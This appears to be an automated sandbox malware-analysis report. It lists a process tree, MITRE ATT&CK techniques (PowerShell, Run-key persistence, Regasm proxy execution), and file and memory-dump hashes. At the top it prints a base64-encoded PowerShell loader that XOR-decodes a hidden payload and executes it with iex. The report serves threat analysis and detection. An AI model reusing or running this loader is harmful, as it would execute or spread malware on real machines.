AFgAbgBsAC8AWgBHAE4AcQBKAFMAbABwAGEARwA1AGkAYQBXAGgAcABUADIAeAArAGEARABzADUASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABtAEYAbwBhAEgAMAB0AEkARgA1AG8AYgBtAEoAagBhAFgANAB0AFAAegBZAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMAB3AEwAVgBaAGUAZABIADUANQBhAEcAQQBqAFIARQBJAGoAWABXAHgANQBaAFYAQQAzAE4AMABwAG8AZQBWAGwAbwBZAEgAMQBkAGIASABsAGwASgBTAFEAdABKAGkAMABxAFgAMgBoAHEAVABIADUAZwBJADIAaAAxAGEAQwBvADIATABWAFoAZQBkAEgANQA1AGEARwBBAGoAUgBFAEkAagBTADIAUgBoAGEARgBBADMATgAxAHAALwBaAEgAbABvAFQARwBGAGgAVAAzAFIANQBhAEgANABsAEsAWABsAG8AWQBIADEATABaAEcARgBvAFgAVwB4ADUAWgBTAEUAdABLAFcAOQAwAGUAVwBoACsASgBEAFkAdABYAG4AbABzAGYAMwBrAGcAWABYADkAaQBiAG0AaAArAGYAaQAwAGcAUwAyAFIAaABhAEYAMQBzAGUAVwBVAHQASwBYAGwAbwBZAEgAMQBMAFoARwBGAG8AWABXAHgANQBaAFMAMABnAFcAbQBSAGoAYQBXAEoANgBYAG4AbAAwAFkAVwBnAHQAUgBXAFIAcABhAFcAaABqACIAOwAKAGYAdQBuAGMAdABpAG8AbgAgAGQAZQBjAG8AZABlAF8AeABvAHIAXwBiAGEAcwBlADYANAAoACQAZQBuAGMAbwBkAGUAZABTAHQAcgAsACAAJABrAGUAeQApACAAewAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwBvAGQAZQBkAFMAdAByACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAgAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBdACgAWwBpAG4AdABdAFsAYwBoAGEAcgBdACQAXwAgAC0AYgB4AG8AcgAgACQAawBlAHkAKQAKACAAIAAgACAAfQAKACAAIAAgACAAJABkAGUAYwBvAGQAZQBkACAAPQAgAC0AagBvAGkAbgAgACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBvAGQAZQBkAEIAeQB0AGUAcwApACkACgAgACAAIAAgAGkAZQB4ACAAJABkAGUAYwBvAGQAZQBkADsACgB9AAoAZABlAGMAbwBkAGUAXwB4AG8AcgBfAGIAYQBzAGUANgA0ACAAJABlAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAxADMACgA=
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - System Binary Proxy Execution: Regsvcs/Regasm
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1808
- - C:\Users\Admin\AppData\Local\Temp\RegAsm.exe
    "C:\Users\Admin\AppData\Local\Temp\RegAsm.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2856

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:868

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Modify Registry

1

T1112

System Binary Proxy Execution

1

T1218

Regsvcs/Regasm

1

T1218.009

Credential Access

Discovery

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RegAsm.exe

Filesize
45KB

MD5
af59d42f6526cfabf0f502f8e83209f9

SHA1
6505f4560261dedfae55dc4a5b712802ffb2eed6

SHA256
f1a47699ad8f48d7cf68f5db51364433ac8695cc6d2149d26dbf20b9af31bf4f

SHA512
f3fc5ee9df8454ee8abce013a1672fdf01c5a5d08d88e6221c169d3a31d43dbaf50e7bdbbe54e8bb8453f5367d12f016cb834ec6efed363c8f8018cd11e4a646

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
9df5ee3447038ee28808dabdc7e97ec0

SHA1
f464a8ba5c957a25de36760014bc752d5ae40b08

SHA256
c0a444a016a834136ac90be99039ba5af759256f2c32b74c0ce544459e59a321

SHA512
453906ac10176c3e9a6e60b0b5d9e8f99cc0212259b9790e171b5d66f809b0feaab9a013b603c4ef9f6ea6a78efacdf57226b64ea2916df4a0839f587e1c504f

Download Submit
memory/868-20-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/868-21-0x0000000140000000-0x00000001405E8000-memory.dmp

Filesize
5.9MB

Download
memory/2372-0-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/2372-1-0x0000000000210000-0x0000000000211000-memory.dmp

Filesize
4KB

Download
memory/2572-6-0x000000001B610000-0x000000001B8F2000-memory.dmp

Filesize
2.9MB

Download
memory/2572-7-0x0000000001F60000-0x0000000001F68000-memory.dmp

Filesize
32KB

Download
memory/2856-19-0x0000000000AC0000-0x0000000000AD2000-memory.dmp

Filesize
72KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads